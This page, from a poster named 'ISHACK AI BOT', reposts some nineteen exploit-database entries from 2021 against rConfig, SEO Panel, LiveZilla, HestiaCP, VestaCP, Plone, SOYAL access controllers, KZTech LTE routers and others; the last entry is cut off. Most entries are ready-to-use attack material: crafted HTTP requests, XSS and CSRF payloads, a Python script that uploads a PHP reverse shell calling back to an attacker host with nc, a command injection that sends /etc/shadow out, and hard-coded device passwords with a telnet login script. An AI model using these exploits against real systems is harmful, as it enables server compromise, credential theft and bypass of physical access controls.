All posts by ISHACK AI BOT

  1. # Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)
     # Date: 2021-03-17
     # Exploit Author: Murat ŞEKER
     # Vendor Homepage: https://www.rconfig.com
     # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
     # Version: rConfig v3.9.6
     # Install scripts :
     # https://www.rconfig.com/downloads/scripts/install_rConfig.sh
     # https://www.rconfig.com/downloads/scripts/centos7_install.sh
     # https://www.rconfig.com/downloads/scripts/centos6_install.sh
     # Tested on: centOS 7
     # Notes : If you want to reproduce in your lab environment follow those links :
     # http://help.rconfig.com/gettingstarted/installation
     # then
     # http://help.rconfig.com/gettingstarted/postinstall
     # Description: rConfig, the open source network device configuration management tool, is vulnerable to Arbitrary File Upload to RCE in /lib/crud/vendors.crud.php with parameter 'vendorLogo'.

     The following steps can be carried out in duplicating this vulnerability.

     - Log in to the rConfig application with your credentials.
     - Repeat

       POST /lib/crud/vendors.crud.php HTTP/1.1
       Host: localhost
       User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 [email protected]
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
       Accept-Language: en-US,en;q=0.5
       Accept-Encoding: gzip, deflate
       Content-Type: multipart/form-data; boundary=---------------------------122590832918963661283831488254
       Content-Length: 36619
       Origin: https://localhost
       Connection: close
       Referer: http://4hmnkrm42ug2n1to46m8lpapggmlp9e.burpcollaborator.net/ref
       Cookie: PHPSESSID=eafcfe393af7dc2a3dd9bd1ea0e9e49b
       Upgrade-Insecure-Requests: 1
       Cache-Control: no-transform

       -----------------------------122590832918963661283831488254
       Content-Disposition: form-data; name="vendorName"

       thisisrce
       -----------------------------122590832918963661283831488254
       Content-Disposition: form-data; name="vendorLogo"; filename="file.php"
       Content-Type: image/png

       <?php phpinfo(); ?>
       -----------------------------122590832918963661283831488254
       Content-Disposition: form-data; name="add"

       add
       -----------------------------122590832918963661283831488254
       Content-Disposition: form-data; name="editid"

       -----------------------------122590832918963661283831488254--

     - Then go to http(s)://<SERVER>/images/vendor/file.php

     Note: The file.php can be accessed without valid credentials. If you change the <?php phpinfo(); ?> to <?php echo $_GET["cmd"];?> and navigate to http(s)://<SERVER>/images/vendor/file.php?cmd=id the `id` command will execute on the server.
  2. # Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (1)
     # Date: 17/02/2021
     # Exploit Author: Piyush Patil
     # Vendor Homepage: https://www.seopanel.org/
     # Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
     # Version: 4.8.0
     # Reference - https://github.com/seopanel/Seo-Panel/issues/209

     Step 1 - Log in to the SEO Panel with admin credentials.
     Step 2 - Go to archive.php
     Step 3 - Change "order_col" value to "*" and copy the request

     Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL --dbs --technique=T --flush-session
  3. # Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
     # Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla
     # Date: 18 Mars 2021
     # Exploit Author: Clément Cruchet
     # Vendor Homepage: https://www.livezilla.net
     # Software Link: https://www.livezilla.net/downloads/en/
     # Version: LiveZilla Server 8.0.1.0 and before
     # Tested on: Windows/Linux
     # CVE : CVE-2019-12962

     GET /mobile/index.php HTTP/1.1
     Host: chat.website.com
     User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: ';alert(document.cookie)//
     Accept-Encoding: gzip, deflate
     DNT: 1
     Connection: close
     Upgrade-Insecure-Requests: 1
  4. # Title: Hestia Control Panel 1.3.2 - Arbitrary File Write
     # Date: 07.03.2021
     # Author: Numan Türle
     # Vendor Homepage: https://hestiacp.com/
     # Software Link: https://github.com/hestiacp/hestiacp
     # Version: < 1.3.3
     # Tested on: HestiaCP Version 1.3.2

     curl --location --request POST 'https://TARGET:8083/api/index.php' \
       --form 'hash="HERE_API_KEY"' \
       --form 'returncode="yes"' \
       --form 'cmd="v-make-tmp-file"' \
       --form 'arg1="ssh-rsa HERE_KEY"' \
       --form 'arg2="/home/admin/.ssh/authorized_keys"' \
       --form 'arg3=""' \
       --form 'arg4=""' \
       --form 'arg5=""'
  5. # Exploit Title: Plone CMS 5.2.3 - 'Title' Stored XSS
     # Date: 18-03-2021
     # Exploit Author: Piyush Patil
     # Vendor Homepage: https://plone.com/
     # Software Link: https://github.com/plone/Products.CMFPlone/tags
     # Version: 5.2.3
     # Tested on: Windows 10
     # Reference - https://github.com/plone/Products.CMFPlone/issues/3255

     Steps to reproduce the issue:
     1- Go to https://localhost/ where Plone 5.2.3 version is installed.
     2- Click on "Log in now" and log in as "Manager"
     3- Navigate to Manager=>Site Setup=>Site
     4- Edit "Site title" field to "xyz<ScRiPt>alert(1)</ScRiPt>"
  6. # Exploit Title: Boonex Dolphin 7.4.2 - 'width' Stored XSS
     # Date: 18-03-2021
     # Exploit Author: Piyush Patil
     # Vendor Homepage: https://www.boonex.com/
     # Software Link: https://www.boonex.com/downloads
     # Version: 7.4.2
     # Tested on: Windows 10
     # Reference - https://github.com/xoffense/POC/blob/main/Boonex%20Dolphin%20CMS%207.4.2%20%20stored%20XSS

     Steps to Reproduce Bug:
     1- Log in to Admin Panel
     2- Go to "Builders" => "Pages Builder"
     3- Select any page
     4- Turn on Burp Suite Intercept and change "other pages width" to "1081px</script><script>alert(document.cookie)</script>"
  7. # Exploit Title: BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path
     # Date: 2021-03-17
     # Exploit Author: Metin Yunus Kandemir
     # Vendor Homepage: https://global.brother/
     # Software Link: https://support.brother.com/g/b/downloadend.aspx?c=us&lang=en&prod=hls7000dn_us_eu_as&os=10013&dlid=dlf005042_000&flang=4&type3=26
     # Version: 3.75.0000
     # Tested on: Windows 10
     # Source: https://docs.unsafe-inline.com/0day/bradmin-professional-3.75-unquoted-service-path

     #Description:
     This software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices. If a user can insert an executable which is called "BRAdmin" under "C:\Program Files (x86)\Brother\", local system privileges could be obtained by the user.

     #Detection of unquoted service path:

     C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """
     Brother BRAdminPro Scheduler  BRA_Scheduler  C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe  Auto

     C:\>sc qc BRA_Scheduler
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: BRA_Scheduler
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : Brother BRAdminPro Scheduler
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem
  8. # Exploit Title: Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated)
     # Date: 19-03-2021
     # Exploit Author: Christian Vierschilling
     # Vendor Homepage: https://www.sourcecodester.com
     # Software Link: https://www.sourcecodester.com/php/11222/profiling-system-human-resource-management.html
     # Software Download: https://www.sourcecodester.com/download-code?nid=11222&title=Profiling+System+For+Human+Resource+Management+using+PHP%2FPDO+with+Source+Code
     # Version: 1.0
     # Tested on: PHP 7.4.14, Linux x64_x86

     # --- Description --- #
     # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.

     # --- Proof of concept --- #

     #!/usr/bin/python3

     import random
     import sys
     import requests
     from requests_toolbelt.multipart.encoder import MultipartEncoder

     def file_upload(target_ip, attacker_ip, attacker_port):
         random_number = str(random.randint(100000000,999999999))
         file_name = random_number + "shell.php"
         revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
         m = MultipartEncoder(fields={'upload': '', 'per_file': (file_name, revshell_string, 'application/x-php')})
         print("(+) Uploading php reverse shell file ..")
         r1 = requests.post('http://{}/ProfilingSystem/add_file_query.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
         if not "Sorry, there was an error uploading your file." in r1.text:
             print("(+) File uploaded to: http://{}/ProfilingSystem/uploads/{}".format(target_ip,file_name))
             return file_name
         else:
             print("(-) Oh noes, error occured while uploading the file.. quitting!")
             exit()

     def trigger_shell(target_ip, target_file_name):
         url = 'http://{}/ProfilingSystem/uploads/{}'.format(target_ip, target_file_name)
         print("(+) Now trying to trigger our shell..")
         r2 = requests.get(url)
         if r2.status_code != 200:
             print("(-) Oh noes, we can't reach the uploaded file.. did it upload correctly?! Quitting!")
             exit()
         else:
             return None

     def main():
         if len(sys.argv) != 4:
             print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0])
             print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
             sys.exit(-1)

         print("--- Exploiting today: Profiling System for Human Resource Management 1.0 ---")
         print("----------------------------------------------------------------------------")

         target_ip = sys.argv[1]
         attacker_ip = sys.argv[2]
         attacker_port = sys.argv[3]

         target_file_name = file_upload(target_ip, attacker_ip, attacker_port)
         trigger_shell(target_ip, target_file_name)
         print("(+) done!")

     if __name__ == "__main__":
         main()
  9. # Title: VestaCP 0.9.8 - 'v_sftp_licence' Command Injection
     # Date: 17.03.2021
     # Author: Numan Türle
     # Vendor Homepage: https://vestacp.com
     # Software Link: https://myvestacp.com < 0.9.8-26-43
     # Software Link: https://vestacp.com < 0.9.8-26

     POST /edit/server/ HTTP/1.1
     Host: TARGET:8083
     Connection: close
     Content-Length: 6633
     Cache-Control: max-age=0
     Content-Type: application/x-www-form-urlencoded
     User-Agent: USER_AGENT
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Accept-Encoding: gzip, deflate
     Accept-Language: en,tr-TR;q=0.9,tr;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
     Cookie: PHPSESSID=HERE_COOKIE
     sec-gpc: 1

     token=149e2b8c201fd88654df6fd694158577&save=save&v_hostname=1338.example.com&v_timezone=Europe%2FIstanbul&v_language=en&v_mail_url=&v_mail_ssl_domain=&v_mysql_url=&v_mysql_password=&v_backup=yes&v_backup_gzip=5&v_backup_dir=%2Fbackup&v_backup_type=ftp&v_backup_host=&v_backup_username=&v_backup_password=&v_backup_bpath=&v_web_ssl_domain=&v_sys_ssl_crt=privatekeyblablabla&v_quota=no&v_firewall=no&v_sftp=yes&v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow&v_filemanager=no&v_filemanager_licence=&v_softaculous=yes&save=Save

     Parameter : v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow
  10. # Exploit Title: Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path
      # Discovery by: Riadh Bouchahoua
      # Discovery Date: 19-03-2021
      # Vendor Homepage: https://mosquitto.org/
      # Software Links : https://mosquitto.org/download/
      # Tested Version: 2.0.9
      # Vulnerability Type: Unquoted Service Path
      # Tested on OS: Windows 10 64 bits

      # Step to discover Unquoted Service Path:
      ====
      C:\Users\Admin>wmic service get name,pathname,startmode |findstr /i /v "C:\Windows\\" |findstr "mosquitto"
      mosquitto  C:\Program Files\mosquitto\mosquitto.exe run
      ====
      C:\Users\Admin>sc qc mosquitto
      [SC] QueryServiceConfig réussite(s)

      SERVICE_NAME: mosquitto
              TYPE               : 10  WIN32_OWN_PROCESS
              START_TYPE         : 2   AUTO_START
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : C:\Program Files\mosquitto\mosquitto.exe run
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : Mosquitto Broker
              DEPENDENCIES       :
              SERVICE_START_NAME : LocalSystem
  11. # Exploit Title: CouchCMS 2.2.1 - SSRF via SVG file upload
      # Date: 2021-01-25
      # Exploit Author: xxcdd
      # Vendor Homepage: https://github.com/CouchCMS/CouchCMS
      # Software Link: https://github.com/CouchCMS/CouchCMS
      # Version: v2.2.1
      # Tested on: Windows 7

      An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows SSRF via an /couch/includes/kcfinder/browse.php SVG upload.

      Upload URL is: /couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en

      ssrf.svg content:

      <?xml version="1.0" encoding="UTF-8" standalone="no"?>
      <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns=" http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
        <image height="200" width="200" xlink:href="http://<test_ip>:1234" />
      </svg>
  12. # Exploit Title: SOYAL Biometric Access Control System 5.0 - Master Code Disclosure
      # Date: 25.01.2021
      # Exploit Author: LiquidWorm
      # Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com

      Vendor: SOYAL Technology Co., Ltd
      Product web page: https://www.soyal.com.tw | https://www.soyal.com
      Affected version:
        AR-727 i/CM - F/W: 5.0
        AR837E/EF - F/W: 4.3
        AR725Ev2 - F/W: 4.3 191231
        AR331/725E - F/W: 4.2
        AR837E/EF - F/W: 4.1
        AR-727CM /i - F/W: 4.09
        AR-727CM /i - F/W: 4.06
        AR-837E - F/W: 3.03

      Summary: Soyal Access systems are built into Raytel Door Entry Systems and provide access and lift control to many buildings, from public and private apartment blocks to prestigious public buildings.

      Desc: The controller suffers from a cleartext transmission of sensitive information. This allows interception of the HTTP traffic and disclosure of the Master code and the Arming code via a man-in-the-middle attack. An attacker can obtain these codes to enter the controller's Programming mode and bypass the physical security controls in place.

      Tested on: SOYAL Technology WebServer 2.0
                 SOYAL Serial Device Server 4.03A
                 SOYAL Serial Device Server 4.01n
                 SOYAL Serial Device Server 3.07n

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5630
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php

      25.01.2021

      --

      $ curl 'http://192.168.1.1/CtrlParam.htm' \
        -H 'Authorization: Basic YWRtaW46' | \
        grep -ni -B1 'masterCode\|armCode'

      <td><font face="Arial,Helvetica">Master Code (6 Digital) </font></td>
      <td colspan="2"><input type=text name="masterCode" size=6 maxlength=6 value=123456></td></tr>
      <td>Arming Code (4 Digital) </td>
      <td colspan="2"><input type=text name="armCode" size=4 maxlength=4 value=1234></td></tr>
  13. # Exploit Title: SOYAL 701 Server 9.0.1 - Insecure Permissions
      # Date: 25.01.2021
      # Exploit Author: LiquidWorm
      # Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com

      Vendor: SOYAL Technology Co., Ltd
      Product web page: https://www.soyal.com.tw | https://www.soyal.com
      Affected version: 9.0.1 190322
                        8.0.6 181227

      Summary: 701 Server is the program used to set up and configure LAN and IP based access control systems, from the COM port used to the quantity and type of controllers connected. It is also used for programming some of the more complex controllers such as the AR-716E and the AR-829E.

      Desc: The application suffers from an elevation of privileges vulnerability which can be used by a simple authenticated user that can change the executable file with a binary of choice. The vulnerability exists due to the improper permissions, with the 'F' flag (Full) for 'Everyone' and 'Authenticated Users' group.

      Tested on: Microsoft Windows 10 Enterprise

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5633
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5633.php

      25.01.2021

      --

      C:\Program Files (x86)\701Server>cacls McuServer.exe
      C:\Program Files (x86)\701Server\McuServer.exe Everyone:F
                                                     NT AUTHORITY\Authenticated Users:(ID)F
                                                     NT AUTHORITY\SYSTEM:(ID)F
                                                     BUILTIN\Administrators:(ID)F
                                                     BUILTIN\Users:(ID)R
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

      C:\Program Files (x86)\701Server>
  14. # Exploit Title: SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF
      # Date: 25.01.2021
      # Exploit Author: LiquidWorm
      # Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com

      Vendor: SOYAL Technology Co., Ltd
      Product web page: https://www.soyal.com.tw | https://www.soyal.com
      Affected version:
        AR-727 i/CM - F/W: 5.0
        AR837E/EF - F/W: 4.3
        AR725Ev2 - F/W: 4.3 191231
        AR331/725E - F/W: 4.2
        AR837E/EF - F/W: 4.1
        AR-727CM /i - F/W: 4.09
        AR-727CM /i - F/W: 4.06
        AR-837E - F/W: 3.03

      Summary: Soyal Access systems are built into Raytel Door Entry Systems and are providing access and lift control to many buildings from public and private apartment blocks to prestigious public buildings.

      Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

      Tested on: SOYAL Technology WebServer 2.0
                 SOYAL Serial Device Server 4.03A
                 SOYAL Serial Device Server 4.01n
                 SOYAL Serial Device Server 3.07n

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5632
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5632.php

      25.01.2021

      --

      <html>
        <body>
          <form action="http://192.168.1.1/userset.cgi" method="POST">
            <input type="hidden" name="pw" value="test123" />
            <input type="hidden" name="pw2" value="test123" />
            <input type="submit" value="Forge me!" />
          </form>
        </body>
      </html>

      ...

      <html>
        <body>
          <form action="http://192.168.1.2/LoginUser.cgi" method="POST">
            <input type="hidden" name="pw" value="drugtest123" />
            <input type="hidden" name="pw2" value="drugtest123" />
            <input type="submit" value="Forge me!" />
          </form>
        </body>
      </html>
  15. # Exploit Title: SOYAL 701 Client 9.0.1 - Insecure Permissions
      # Date: 25.01.2021
      # Exploit Author: LiquidWorm
      # Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com

      Vendor: SOYAL Technology Co., Ltd
      Product web page: https://www.soyal.com.tw | https://www.soyal.com
      Affected version: 9.0.1 190410
                        9.0.1 190115

      Summary: 701 Client is the user interface software for the access control system. It is used for adding and deleting tokens, setting door groups for access, setting time zones for limiting access and monitoring ingress and egress on a live system, among other things.

      Desc: The application suffers from an elevation of privileges vulnerability which can be used by a simple authenticated user that can change the executable file with a binary of choice. The vulnerability exists due to the improper permissions, with the 'F' flag (Full) for 'Authenticated Users' group.

      Tested on: Microsoft Windows 10 Enterprise

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5634
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5634.php

      25.01.2021

      --

      C:\Program Files (x86)\701Client>cacls client.exe
      C:\Program Files (x86)\701Client\client.exe NT AUTHORITY\Authenticated Users:F
                                                  NT AUTHORITY\Authenticated Users:(ID)F
                                                  NT AUTHORITY\SYSTEM:(ID)F
                                                  BUILTIN\Administrators:(ID)F
                                                  BUILTIN\Users:(ID)R
                                                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                                  APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

      C:\Program Files (x86)\701Client>
  16. # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
      # Date: 03.02.2021
      # Exploit Author: LiquidWorm
      # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

      Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
      Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                        http://www.jatontec.com/products/show.php?itemid=258
                        http://www.jatontech.com/CAT12.html#_pp=105_564
                        http://www.kzbtech.com/AM3300V.html
                        https://neotel.mk/ostanati-paketi-2/

      Affected version:

      Model    | Firmware
      ---------|-----------
      JT3500V  | 2.0.1B1064
      JT3300V  | 2.0.1B1047
      AM6200M  | 2.0.0B3210
      AM6000N  | 2.0.0B3042
      AM5000W  | 2.0.0B3037
      AM4200M  | 2.0.0B2996
      AM4100V  | 2.0.0B2988
      AM3500MW | 2.0.0B1092
      AM3410V  | 2.0.0B1085
      AM3300V  | 2.0.0B1060
      AM3100E  | 2.0.0B981
      AM3100V  | 2.0.0B946
      AM3000M  | 2.0.0B21
      KZ7621U  | 2.0.0B14
      KZ3220M  | 2.0.0B04
      KZ3120R  | 2.0.0B01

      Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service.

      Desc: The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' HTTP POST parameter bypassing the injection protection filter.

      Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
                 Linux 2.6.36+ (mips)
                 Mediatek APSoC SDK v4.3.1.0

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5635
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php

      03.02.2021

      --

      #JT3300V/AM3300V
      lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
        --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
        -H "Cookie: kz_userid=admin:311139" \
        -H "X-Requested-With: XMLHttpRequest"
      ping: bad address 'Linux'
      lqwrm@metalgear:~/prive$

      #JT3500V
      lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
        --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
        -H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \
        -H "X-Requested-With: XMLHttpRequest"
      ping: bad address 'Linux'
      lqwrm@metalgear:~/prive$
  17. # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
      # Date: 03.02.2021
      # Exploit Author: LiquidWorm
      # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

      Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
      Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                        http://www.jatontec.com/products/show.php?itemid=258
                        http://www.jatontech.com/CAT12.html#_pp=105_564
                        http://www.kzbtech.com/AM3300V.html
                        https://neotel.mk/ostanati-paketi-2/

      Affected version:

      Model    | Firmware
      ---------|-----------
      JT3500V  | 2.0.1B1064
      JT3300V  | 2.0.1B1047
      AM6200M  | 2.0.0B3210
      AM6000N  | 2.0.0B3042
      AM5000W  | 2.0.0B3037
      AM4200M  | 2.0.0B2996
      AM4100V  | 2.0.0B2988
      AM3500MW | 2.0.0B1092
      AM3410V  | 2.0.0B1085
      AM3300V  | 2.0.0B1060
      AM3100E  | 2.0.0B981
      AM3100V  | 2.0.0B946
      AM3000M  | 2.0.0B21
      KZ7621U  | 2.0.0B14
      KZ3220M  | 2.0.0B04
      KZ3120R  | 2.0.0B01

      Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service.

      Desc: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker can disclose sensitive and clear-text information resulting in authentication bypass by downloading the configuration of the device and revealing the admin password.

      Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
                 Linux 2.6.36+ (mips)
                 Mediatek APSoC SDK v4.3.1.0

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5636
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php

      03.02.2021

      --

      $ curl -s \
        -o configtest.zlib \                                    # Default: config.dat
        'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \
        binwalk -e configtest.zlib ; \
        cd _configtest.zlib_extracted ; \
        strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \   # cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device
        cd ..
      3:Login=admin
      4:Password=neotelwings
      5:TelnetPwd=root123
      6:GuestId=user
      7:GuestPassword=user123
      89:DDNSPassword=
      239:auto_update_password=
      279:Tr069_Password=
      288:Tr069_ConnectionRequestPassword=admin
      300:Tr069_STUNPassword=
      339:telnetManagement=2
      $
  18. # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
      # Date: 03.02.2021
      # Exploit Author: LiquidWorm
      # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

      Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
      Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                        http://www.jatontec.com/products/show.php?itemid=258
                        http://www.jatontech.com/CAT12.html#_pp=105_564
                        http://www.kzbtech.com/AM3300V.html
                        https://neotel.mk/ostanati-paketi-2/

      Affected version:

      Model    | Firmware
      ---------|-----------
      JT3500V  | 2.0.1B1064
      JT3300V  | 2.0.1B1047
      AM6200M  | 2.0.0B3210
      AM6000N  | 2.0.0B3042
      AM5000W  | 2.0.0B3037
      AM4200M  | 2.0.0B2996
      AM4100V  | 2.0.0B2988
      AM3500MW | 2.0.0B1092
      AM3410V  | 2.0.0B1085
      AM3300V  | 2.0.0B1060
      AM3100E  | 2.0.0B981
      AM3100V  | 2.0.0B946
      AM3000M  | 2.0.0B21
      KZ7621U  | 2.0.0B14
      KZ3220M  | 2.0.0B04
      KZ3120R  | 2.0.0B01

      Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service.

      Desc: The device utilizes hard-coded credentials within its Linux distribution image. These sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the router.

      Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
                 Linux 2.6.36+ (mips)
                 Mediatek APSoC SDK v4.3.1.0

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5637
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php

      03.02.2021

      --

      Default web creds:
      ------------------
      admin:admin123
      user:user123

      Telnet/SSH access:
      ------------------
      admin:root123

      ===

      import telnetlib

      host="192.168.1.1"
      user="admin"
      password="root123"

      s=telnetlib.Telnet(host)
      s.read_until(b"CPE login: ")
      s.write(user.encode('ascii') + b"\n")
      s.read_until(b"Password: ")
      s.write(password.encode('ascii') + b"\n")
      s.write(b"busybox\n")
      print(s.read_all().decode('ascii'))
      s.mt_interact()
      s.close()
  19. # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
      # Date: 03.02.2021
      # Exploit Author: LiquidWorm
      # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

      Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
      Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                        http://www.jatontec.com/products/show.php?itemid=258
                        http://www.jatontech.com/CAT12.html#_pp=105_564
                        http://www.kzbtech.com/AM3300V.html
                        https://neotel.mk/ostanati-paketi-2/

      Affected version:

      Model    | Firmware
      ---------|-----------
      JT3500V  | 2.0.1B1064
      JT3300V  | 2.0.1B1047
      AM6200M  | 2.0.0B3210
      AM6000N  | 2.0.0B3042
      AM5000W  | 2.0.0B3037
      AM4200M  | 2.0.0B2996
      AM4100V  | 2.0.0B2988
      AM3500MW | 2.0.0B1092
      AM3410V  | 2.0.0B1085
      AM3300V  | 2.0.0B1060
      AM3100E  | 2.0.0B981
      AM3100V  | 2.0.0B946
